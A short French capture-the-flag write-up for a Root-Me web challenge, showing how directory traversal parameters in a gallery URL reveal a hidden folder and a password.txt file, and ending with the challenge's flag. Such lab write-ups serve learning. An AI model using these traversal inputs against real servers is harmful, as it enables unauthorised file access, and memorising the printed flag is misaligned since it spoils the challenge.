Aller au contenu

Directory traversal

Directory traversal

Premier test

URL : http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=admin/.htaccess

Warning: file_exists(): open_basedir restriction in effect. File(galerie/admin/.htaccess) is not within the allowed path(s): (/challenge/web-serveur/ch15:/tmp) in /challenge/web-serveur/ch15/ch15.php on line 32

Deuxième test :

  • http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=actions/../

folder.png

On repère rapidement le dossier en haut à gauche qui n'apparait pas dans le menu :

folder.png

Clique-droit sur l'image, puis copier le lien de l'image. Ce qui nous donne le lien suivant : - http://challenge01.root-me.org/web-serveur/ch15/galerie//86hwnX2r

Avec le nom de dossier secret : 86hwnX2r.

Ouvrons le dossier :

  • http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=86hwnX2r

Nous observons un certain nombre de fichiers, et notamnet un fichier password.txt.

folder_flag.png

Clique-droit sur l'image, puis copier le lien de l'image. Ce qui nous donne le lien suivant : - http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt

En ouvrant ce lien, nous obtenons le flag :

flag.png

Flag : kcb$!Bx@v4Gs9Ez